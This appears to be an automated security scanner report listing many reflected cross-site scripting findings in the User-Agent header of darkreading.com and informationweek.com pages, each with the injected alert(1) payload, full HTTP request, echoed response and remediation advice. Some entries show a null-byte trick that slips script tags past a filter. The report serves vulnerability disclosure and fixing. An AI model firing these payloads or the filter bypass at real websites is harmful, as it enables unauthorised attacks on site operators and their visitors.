The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd857"-alert(1)-"3b198c1bf5f was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/225701866/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)fd857"-alert(1)-"3b198c1bf5f Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c59a4"-alert(1)-"4052edbc9fc was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/225702192/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c59a4"-alert(1)-"4052edbc9fc Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a31da"-alert(1)-"d032b2086d1 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/225702468/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)a31da"-alert(1)-"d032b2086d1 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65634"-alert(1)-"3aabd81b0f5 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/225702839/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)65634"-alert(1)-"3aabd81b0f5 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c121"-alert(1)-"f331211b6fb was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/226600195/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)2c121"-alert(1)-"f331211b6fb Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ab0c"-alert(1)-"0933108224c was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/226700229/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)5ab0c"-alert(1)-"0933108224c Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 226f7"-alert(1)-"229f4ad6156 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/226700529/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)226f7"-alert(1)-"229f4ad6156 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83dc8"-alert(1)-"3c2f592cbdb was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/226900007/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)83dc8"-alert(1)-"3c2f592cbdb Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85915"-alert(1)-"0900b168360 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/227300150/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)85915"-alert(1)-"0900b168360 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed7b4"-alert(1)-"b1ad7ed7286 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/227500152/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ed7b4"-alert(1)-"b1ad7ed7286 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31126"-alert(1)-"e2f4c8c43ff was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/attacks-breaches HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)31126"-alert(1)-"e2f4c8c43ff Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31954"-alert(1)-"89421c1061c was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/client-security HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)31954"-alert(1)-"89421c1061c Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b6a0"-alert(1)-"4fb33c0f810 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/encryption HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)7b6a0"-alert(1)-"4fb33c0f810 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7fe1"-alert(1)-"f3677b08217 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/nac HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)d7fe1"-alert(1)-"f3677b08217 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9bfdc"-alert(1)-"ff1a6d8986 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/perimeter-security HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)9bfdc"-alert(1)-"ff1a6d8986 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6ca8b"-alert(1)-"2494c33683d was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/privacy HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)6ca8b"-alert(1)-"2494c33683d Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c7b5"-alert(1)-"5ea3fafdcf7 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/security-management HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)3c7b5"-alert(1)-"5ea3fafdcf7 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5986d"-alert(1)-"1354046a507 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/storage-security HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)5986d"-alert(1)-"1354046a507 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Storage S ...[SNIP]...
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4eee3"-alert(1)-"c6ea8b29333 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/vulnerabilities HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)4eee3"-alert(1)-"c6ea8b29333 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38f54"-alert(1)-"f3899e95154 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cloud-computing/ HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)38f54"-alert(1)-"f3899e95154 Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:20:44 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:20:44 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 66407
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><t ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)38f54"-alert(1)-"f3899e95154"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop21="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %006dd6f</script><script>alert(1)</script>878a9cc9ad4 was submitted in the User-Agent HTTP header. This input was echoed as 6dd6f</script><script>alert(1)</script>878a9cc9ad4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /events/ HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%006dd6f</script><script>alert(1)</script>878a9cc9ad4 Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:20:41 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:20:41 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 100484
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><t ...[SNIP]... s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%006dd6f</script><script>alert(1)</script>878a9cc9ad4"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop21="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00cc07e"-alert(1)-"667596fca51 was submitted in the User-Agent HTTP header. This input was echoed as cc07e"-alert(1)-"667596fca51 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /global-cio/ HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00cc07e"-alert(1)-"667596fca51 Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:20:21 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:20:21 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 67906
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><t ...[SNIP]... s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00cc07e"-alert(1)-"667596fca51"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop21="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12a6c"-alert(1)-"1f25c426468 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
